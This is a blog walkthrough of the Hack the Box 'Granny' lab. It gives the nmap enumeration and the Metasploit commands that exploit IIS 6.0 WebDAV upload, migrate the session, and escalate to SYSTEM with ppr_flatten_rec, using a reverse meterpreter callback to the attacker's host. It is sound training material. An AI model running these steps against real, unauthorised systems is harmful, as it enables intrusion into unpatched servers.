Hello friends!! Today we are going to solve another
CTF challenge “Granny” which is categories as retried lab
presented by Hack the Box for making online penetration
practices. Challenges in this lab is not hard to complete although they
are like brain teaser for beginner as well as for expert penetration tester
too.
Level: Intermediate
Task: find user.txt and root.txt file
in victim’s machine.
Since these labs are online
accessible therefore they have static IP. The IP of Granny is 10.10.10.15 so
let’s initiate with nmap port enumeration.
nmap -A 10.10.10. 15
From given below image, you
can observe we found port 80 is open and Microsoft IIS 6.0 is running in
victim’s network.
Significant port 80 is open in victim’s network we preferred
to explore his IP in browser and resulting web page is shown below.
Since we know Microsoft IIS httpd 6.0 is running in victims
system therefore when I Google I found Rapid 7 exploit for this as
highlighted in given below image.
Without wasting time I open a new terminal and type
msfconsole for loading metasploit framework and use module iis_webdav for
exploiting targets system.
use
exploit/windows/iis/iis_webdav_upload_asp
msf
exploit(windows/iis/iis_webdav_upload_asp) >set rhost 10.10.10.15
msf
exploit(windows/iis/iis_webdav_upload_asp) >run
From given below image you can observe meterpreter shell session1 opened
for accessing victim tty shell.
Every time my meterpreter session get died therefore I go
post exploitation for migrating current process in to another process by
executing following module.
use
post/windows/manage/migrate
msf post(windows/manage/migrate)>set session 1
msf
post(windows/manage/migrate)>
run
Above module will migrate a Meterpreter session from one
process to another. A given process PID to migrate to or the module can spawn
one and migrate to that newly spawned process.
Then I run a post exploit “Multi Recon Local Exploit
Suggester” that suggests local meterpreter exploits that can be used for
further exploit. The exploits are recommended founded on the architecture and
platform that the user has a shell opened as well as the available exploits in
meterpreter.
use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester)
> set session 1
msf post(multi/recon/local_exploit_suggester)
> exploit
Wonderful!! Exploit Suggester truly proof itself
by suggesting other exploit name to which target is vulnerable. So now we will
go with last option as highlighted in image.
At this time use pprFlattenRec Local Privilege Escalation
module for making unauthorized access again but as privileged user.
use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec)
>set session 1
msf exploit(windows/local/ppr_flatten_rec)
>set wait 20
msf exploit(windows/local/ppr_flatten_rec)
> set lhost 10.10.14.6
msf exploit(windows/local/ppr_flatten_rec)
> exploit
Nice!! It works and we got meterpreter session 2
as system user and you can check in below image.
Meterpreter > getuid
As we have tty shell that has system privileges now let’s
complete this task my searching user.txt and root.txt flag which is hidden
somewhere inside a directory.
Meterpreter > ls
Here we found Document and setting let’s explore
Inside c:\Document and Setting\Lakis \Desktop I
found user.txt file and used type “file name” command for
reading this file.
cd Desktop
type user.txt
Great!! We got our 1st flag
successfully
Inside c:\Document and Setting\Administrtator
\Desktop I found root.txt file and used type “file
name” command for reading this file.
cd Desktop
typeroot.txt
Great!! We got our 2st flag
successfully
Breaching this lab was interesting and enjoyable moment for
me. It will take less time if you are aware of proper metasploit exploits.
Therefore I will give all Glory to Metasploit for making this
challenge easy for me.
Happy Hacking!!
0 comments:
Post a Comment